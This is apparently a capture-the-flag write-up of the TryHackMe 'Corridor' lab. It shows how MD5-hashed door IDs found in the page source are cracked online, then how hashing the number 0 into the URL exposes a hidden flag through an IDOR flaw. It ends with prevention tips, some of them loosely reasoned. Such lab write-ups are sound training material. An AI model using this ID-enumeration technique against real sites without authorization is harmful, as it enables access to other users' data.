4.7.web idor corridor thm(Web Security Academy)

What is the flagĀ ..!?

What is the flag?\ Flag{################################}

Insecure Direct Object References (IDOR) is a type of security vulnerability that occurs\ when an application allows an attacker to access a protected resource by modifying the\ value of a parameter that references the resource. For example, an IDOR vulnerability\ could allow an attacker to view the profile of another user by changing the user_id\ parameter in a URL.\ -First, we connected the machine and obtained the serverā€™s IPĀ .\ -Then I put the IP on the browser, and this was the resultĀ :

So where is theĀ key?

When I was hovering over these doors with my mouse, I noticed that each door has a\ different path with different numbersĀ , I had to look at the code for the pageĀ .

  • After opening the source code, I found the codes in this form, so I decided to check\ themĀ , i took all this to Note and then went to search and find out what kind of hash\ it isĀ , went to\ https://www.tunnelsup.com/hash-analyzer/

I learned that the hash type (MD4 or MD5)Ā , went to\ https://crackstation.net/

  • This was the resultĀ :

-From here I was sure it was over MD5Ā , But we should note something important here,the Resalt is equal to 1Ā .\ -Well I have to see the result of the rest of the hashtagsĀ :

  • Well, the results here are sequential in numbers from 1 to 13 by the number of doorsĀ ,\ We felt that since this room is under the name of the IDOR vulnerability, I decided to\ put the numbers one behind the second behind the IP in the URLĀ :

-Well,it seems to be something else, but do not forget that it is the IDOR\ vulnerability,So we will try numbers before 1 and after 13Ā ,Well it didnā€™t workĀ .\ -But the hash result was from 1 to 13, so we will make a hash MD5 For number 14 Athttps://gchq.github.io/CyberChef

-Then I tried it again by hashing it to the URL until I found the flagĀ , But it didnā€™t work

-Then bring the hash of number 0 ( cfcd208495d565ef66e7dff9f98764da )Ā .\ -Then try the hash of number 0 with the URLĀ .\ -Hey, it worked

Flag: flag{2477##########################2e}

Here are some additional tips for preventing IDOR\ vulnerabilities:\ ā€¢Use parameterized queries instead of direct object references in database queries.\ ā€¢Use input validation to prevent attackers from injecting malicious code into parameters.\ ā€¢Use strong authentication and authorization mechanisms to protect resources.\ ā€¢Regularly scan your applications for IDOR vulnerabilities.

see you soon

Abdelwahab_Shandy

AS_Cyber